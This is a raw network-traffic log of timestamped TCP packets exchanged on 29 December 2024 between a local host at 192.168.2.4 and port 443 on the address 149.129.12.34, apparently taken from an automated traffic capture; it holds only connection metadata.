                                                                                                                                                                                                            Dec 29, 2024 09:02:02.218982935 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.219001055 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.219177961 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.219192028 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.219244957 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.227233887 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.227252960 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.227324009 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.227339029 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.227406979 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.329910040 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.329941034 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.330125093 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.330149889 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.330193996 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.363109112 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.363137007 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.363228083 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.363244057 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.363286972 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.368046999 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.368068933 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.368140936 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.368149042 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.368185997 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.373661041 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.373684883 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.373720884 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.373730898 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.373758078 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.373778105 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.379295111 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.379327059 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.379353046 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.379359961 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.379381895 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.379399061 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.384270906 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.384294987 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.384330034 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.384335995 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.384375095 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.390227079 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.390244007 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.390280962 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.390286922 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.390324116 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.396853924 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.396882057 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.396919012 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.396925926 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.396962881 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.520390034 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.520421982 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.520556927 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.520582914 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.520621061 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.554578066 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.554610014 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.555027962 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.555035114 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.555073023 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.560154915 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.560174942 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.560348034 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.560354948 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.560396910 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.565798044 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.565817118 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.565891027 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.565897942 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.565932989 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.570786953 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.570806026 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.570849895 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.570856094 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.570882082 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.570899963 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.576433897 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.576452971 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.576504946 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.576510906 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.576544046 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.581763983 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.581784010 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.581847906 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.581854105 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.581888914 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.588535070 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.588555098 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.588593006 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.166105986 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.166126966 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.293566942 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.293586969 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.293908119 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.293936014 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.293981075 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.325242996 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.325263023 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.325577974 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.325592041 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.325634956 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.330528975 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.330543995 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.330605984 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.330612898 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.330652952 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.336100101 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.336117029 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.336174965 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.336182117 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.336216927 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.341742039 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.341767073 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.341809988 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.341818094 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.341840029 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.341854095 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.346767902 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.346784115 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.346842051 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.346849918 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.346890926 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.352030993 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.352045059 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.352093935 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.352101088 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.352123022 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.352138996 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.357819080 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.357836008 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.357888937 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.357901096 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.357934952 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.484441042 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.484463930 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.484525919 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.484548092 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.484584093 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.517373085 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.517400980 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.517494917 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.517517090 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.517558098 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.522568941 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.522597075 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.522651911 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.522669077 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.522681952 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.522712946 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.528129101 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.528148890 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.528194904 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.528208017 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.528247118 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.533838034 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.533860922 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.533902884 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.533916950 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.533942938 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.533957005 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.538795948 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.538820028 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.538881063 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.538892984 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.538927078 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.544765949 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.544789076 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.544826031 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.544832945 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.544859886 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.544876099 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.637166023 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.637200117 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.637310028 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.637334108 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.637478113 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.676548004 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.676592112 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.676654100 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.676670074 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.676706076 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.709722042 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.709742069 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.709810019 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.709821939 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.709861994 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.714782000 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.714797020 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.714852095 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.714860916 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.714895010 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.307758093 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.307773113 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.307811022 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.307821035 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.307843924 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.307868004 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.312980890 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.312994957 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.313061953 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.313071012 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.315776110 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.405205011 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.405230999 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.405309916 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.405327082 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.407777071 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.445393085 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.445414066 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.445472956 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.445483923 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.445509911 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.445522070 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.477945089 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.477967978 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.478009939 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.478028059 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.478044987 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.478063107 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.483633041 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.483649015 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.483689070 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.483700991 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.483714104 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.483737946 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.489182949 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.489200115 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.489249945 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.489264011 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.489340067 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.494184971 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.494199038 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.494251966 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.494266033 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.494366884 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.499902010 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.499917030 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.499963999 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.499977112 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.500740051 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.505170107 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.505183935 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.505223989 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.505237103 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.505249977 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.505266905 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.597235918 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.597259998 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.597321033 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.597340107 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.597353935 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.597373962 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.637082100 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.637109995 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.637221098 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.637228012 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.637284040 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.669991016 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.670007944 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.670098066 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.670104027 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.670139074 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.675781965 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.675798893 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.675864935 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.675873041 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.675906897 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.681216002 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.681231022 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.681298018 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.681305885 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.683768034 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.686898947 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.686913967 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.686973095 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.686980963 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.687407017 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.691888094 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.691903114 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.691967010 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.691975117 CET44349735149.129.12.34192.168.2.4
